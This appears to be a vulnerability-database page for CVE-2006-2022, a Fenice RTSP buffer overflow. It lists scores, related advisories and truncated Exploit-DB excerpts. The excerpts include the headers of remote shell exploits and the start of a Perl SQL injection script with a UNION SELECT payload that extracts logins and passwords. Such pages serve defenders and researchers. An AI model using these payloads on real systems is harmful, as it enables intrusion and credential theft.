CVE-2006-2022
published 2006-04-25
CVE-2006-2022: Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url.c) in Fenice 1.10 and earlier allows remote attackers to execute arbitrary code…
Priority: P345 high, 7.5 (CVSS 2.0)
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 14.67% (96.2th percentile)
Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url.c) in Fenice 1.10 and earlier allows remote attackers to execute arbitrary code via a long URL.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ls3 | fenice | <= 1.10 | — |
CVSS provenance
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
osv · 7.5 HIGH
cisa · 8.8 HIGH
OSV
apache2 vulnerabilities
osv·2023-02-01·CVSS 7.5
CVE-2006-20001 apache2 vulnerabilities
It was discovered that the Apache HTTP Server mod_dav module incorrectly
handled certain If: request headers. A remote attacker could possibly use
this issue to cause the server to crash, resulting in a denial of service.
(CVE-2006-20001)
ZeddYu_Lu discovered that the Apache HTTP Server mod_proxy_ajp module
incorrectly interpreted certain HTTP Requests. A remote attacker could
possibly use this issue to perform an HTTP Request Smuggling attack.
(CVE-2022-36760)
Dimas Fariski Setyawan Putra discovered that the Apache HTTP Server
mod_proxy module incorrectly truncated certain response headers. This may
result in later headers not being interpreted by the client.
(CVE-2022-37436)
OSV
apache2 vulnerabilities
osv·2023-01-31·CVSS 7.5
CVE-2006-20001 apache2 vulnerabilities
It was discovered that the Apache HTTP Server mod_dav module did not
properly handle specially crafted request headers. A remote attacker
could possibly use this issue to cause the process to crash, leading
to a denial of service. (CVE-2006-20001)
It was discovered that the Apache HTTP Server mod_proxy_ajp module did not
properly handle certain invalid Transfer-Encoding headers. A remote attacker
could possibly use this issue to perform an HTTP Request Smuggling attack.
(CVE-2022-36760)
GHSA
GHSA-j99q-v2mf-qpg9: Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url
ghsa_unreviewed·2022-05-01
CVE-2006-2022 [HIGH] GHSA-j99q-v2mf-qpg9: Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url
Buffer overflow in the parse_url function in the RTSP module (rtsp/parse_url.c) in Fenice 1.10 and earlier allows remote attackers to execute arbitrary code via a long URL.
CISA
Microsoft Word Malformed Object Pointer Vulnerability
cisa·2022-06-08·CVSS 8.8
CVE-2006-2492 [HIGH] CWE-120 Microsoft Word Malformed Object Pointer Vulnerability
Vulnerability: Microsoft Word Malformed Object Pointer Vulnerability
Affected: Microsoft Word
Microsoft Word and Microsoft Works Suites contain a malformed object pointer which allows attackers to execute code.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2006-2492
Remediation Due Date: 2022-06-22
CISA
Apache Struts 1 ActionForm Denial-of-Service Vulnerability
cisa·2022-01-21·CVSS 7.5
CVE-2006-1547 [HIGH] Apache Struts 1 ActionForm Denial-of-Service Vulnerability
Vulnerability: Apache Struts 1 ActionForm Denial-of-Service Vulnerability
Affected: Apache Struts 1
ActionForm in Apache Struts versions before 1.2.9 with BeanUtils 1.7 contains a vulnerability that allows for denial-of-service (DoS).
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2006-1547
Remediation Due Date: 2022-07-21
No detection rules found.
Exploit-DB
Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow
exploitdb·2007-04-29
CVE-2006-2022 Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow
---
/*
**
** Fedora Core 6 (exec-shield) based
** Fenice OMS server (fenice-1.10.tar.gz) remote root exploit
** by Xpl017Elz
**
** Advanced exploitation in exec-shield (Fedora Core case study)
** URL: http://x82.inetcop.org/h0me/papers/FC_exploit/FC_exploit.txt
**
** Reference: https://www.securityfocus.com/bid/17678
** vendor: http://streaming.polito.it/legacy_server
**
** --
** exploit by "you dong-hun"(Xpl017Elz), .
** My World: http://x82.inetcop.org
**
*/
/*
** -=-= POINT! POINT! POINT! POINT! POINT! =-=-
**
** This is a very common standalone daemon remote buffer overflow vulnerability.
** I used the method that I used on my proftpd exploit again to avoid random mapping library.
** And I'm planning to publish it in Englis
Exploit-DB
Fenice Oms 1.10 - GET Remote Buffer Overflow
exploitdb·2006-04-25
CVE-2006-2022 Fenice Oms 1.10 - GET Remote Buffer Overflow
---
/*
IHS Iran Homeland Security public source code
Fenice - Open Media Streaming Server remote BOF exploit
author : c0d3r "kaveh razavi" [email protected]
package : fenice-1.10.tar.gz and prolly prior versions
workaround : update after patch release
advisory : https://www.securityfocus.com/bid/17678
company address : http://streaming.polito.it/server
timeline :
23 Apr 2006 : vulnerability reported by Luigi Auriemma
25 Sep 2006 : IHS exploit released
exploit features :
1) a global offset
2) reliable metasploit shellcode
3) autoconnect to shell
bad chars : 0x00 0x05 encoder : PexAlphaNum
compiled with gcc under Linux : gcc fenice.c -o fenice
Exploitation Method : linux-gate.so.1
the reference written by izik could be downloaded from milw0rm.
Exploit-DB
CoreNews 2.0.1 - 'userid' SQL Injection
exploitdb·2006-04-21
CVE-2006-2032 CoreNews 2.0.1 - 'userid' SQL Injection
---
#!/usr/bin/perl
#Method found & Exploit scripted by nukedx
#Contacts > ICQ: 10072 MSN/Main: [email protected] web: www.nukedx.com
#Original advisory: http://www.nukedx.com/?viewdoc=24
#Usage: corenews.pl
use IO::Socket;
if(@ARGV != 2) { usage(); }
else { exploit(); }
sub header()
{
print "\n- NukedX Security Advisory Nr.2006-24\r\n";
print "- CoreNews \r\n";
print "- -> Victim's host ex: www.victim.com\r\n";
print "- -> Path to CoreNews ex: /corenews/\r\n";
exit();
}
sub exploit ()
{
#Our variables...
$cnserver = $ARGV[0];
$cnserver =~ s/(http:\/\/)//eg;
$cnhost = "http://".$cnserver;
$cndir = $ARGV[1];
$cnport = "80";
$cntar = "preview.php?userid=";
$cnxp = "-1/**/UNION/**/SELECT/**/null,concat(2022,login,20223,password,2203),null,null,null,nu
No writeups or analysis indexed.
http://aluigi.altervista.org/adv/fenicex-adv.txt
http://secunia.com/advisories/19770
http://securityreason.com/securityalert/794
http://www.securityfocus.com/archive/1/431870/100/0/threaded
http://www.securityfocus.com/archive/1/432002/100/0/threaded
http://www.securityfocus.com/archive/1/436256/100/0/threaded
http://www.securityfocus.com/bid/17678
http://www.vupen.com/english/advisories/2006/1491
https://exchange.xforce.ibmcloud.com/vulnerabilities/26078